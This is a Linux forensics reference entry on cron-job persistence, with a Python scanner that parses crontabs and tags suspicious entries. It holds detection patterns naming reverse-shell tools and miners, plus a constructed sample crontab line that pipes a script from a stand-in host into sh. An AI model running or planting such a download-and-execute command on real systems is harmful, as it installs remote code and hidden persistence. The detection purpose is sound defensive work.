Cron Jobs

linux, Persistence Mechanisms, Disk Image

Location

/etc/crontab, /etc/cron.d/*, /var/spool/cron/crontabs/<user>

Description

Scheduled task definitions across system-wide crontab, the cron.d drop-in directory, and per-user crontabs. Each entry specifies a schedule, user context, and command to execute.

Forensic Value

Cron is the most common Linux persistence mechanism. Attacker cron entries typically download and execute payloads from external URLs, restart reverse shells at intervals, or run cryptominers. Checking /var/spool/cron/crontabs/ for all users reveals per-user entries that do not appear in the system-wide crontab. File modification timestamps on cron files help establish when persistence was installed.
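An added example (not part of the original page) of the checks described above: it walks the three cron locations under a mounted image root, parses each entry, records the file's modification time, and tags commands that match heuristic patterns. The function names, the patterns and the sample files written by `demo()` are assumptions made for illustration.

```python
import re, tempfile, time
from pathlib import Path

# Heuristic patterns for the behaviours named above (assumed; tune per case).
SUSPICIOUS = {
    "download-and-execute": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|da|z)?sh\b"),
    "reverse-shell": re.compile(r"/dev/tcp/|\bmkfifo\b|\bn(c|cat)\b.*\s-e\s"),
    "cryptominer": re.compile(r"xmrig|minerd|stratum\+tcp", re.I),
}
ENTRY = re.compile(r"^(@\w+|[\d*]\S*(?:\s+\S+){4})\s+(.*)$")  # schedule, then rest

def parse_line(line, has_user_field):
    """Return (schedule, user, command); None for comments, blanks, VAR=value lines.
    /etc/crontab and /etc/cron.d/* carry a user column; per-user crontabs do not."""
    m = ENTRY.match(line.strip())
    if not m:
        return None
    schedule, rest = m.groups()
    user, rest = (rest.split(None, 1) + [""])[:2] if has_user_field else (None, rest)
    return schedule, user, rest.strip()

def scan(root):
    """Walk the cron locations under a mounted image root; one finding per entry."""
    root = Path(root)
    dirs = [("etc/cron.d", True), ("var/spool/cron/crontabs", False)]
    targets = [(root / "etc/crontab", True)] + [
        (p, u) for d, u in dirs for p in sorted((root / d).glob("*"))]
    findings = []
    for path, has_user in targets:
        if not path.is_file():
            continue
        mtime = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(path.stat().st_mtime))
        for n, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
            entry = parse_line(line, has_user)
            if entry:
                schedule, user, command = entry
                tags = [t for t, rx in SUSPICIOUS.items() if rx.search(command)]
                findings.append({"file": str(path.relative_to(root)), "line": n,
                                 "mtime": mtime, "user": user or path.name,
                                 "schedule": schedule, "command": command, "tags": tags})
    return findings

def demo():
    """Constructed sample image root: one benign system job, one flagged user job."""
    root = Path(tempfile.mkdtemp())
    for d in ("etc/cron.d", "var/spool/cron/crontabs"):
        (root / d).mkdir(parents=True)
    (root / "etc/crontab").write_text("SHELL=/bin/sh\n17 * * * * root run-parts /etc/cron.hourly\n")
    (root / "var/spool/cron/crontabs/www-data").write_text(
        "# constructed sample\n*/5 * * * * curl -s http://example.invalid/x.sh | sh\n")
    return scan(root)
```

Point `scan()` at the mount point of a read-only image so the reported modification times are those preserved in the image, not those of the analysis host.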

Tools Required

cat, find, ls -la, crontab -l, aureport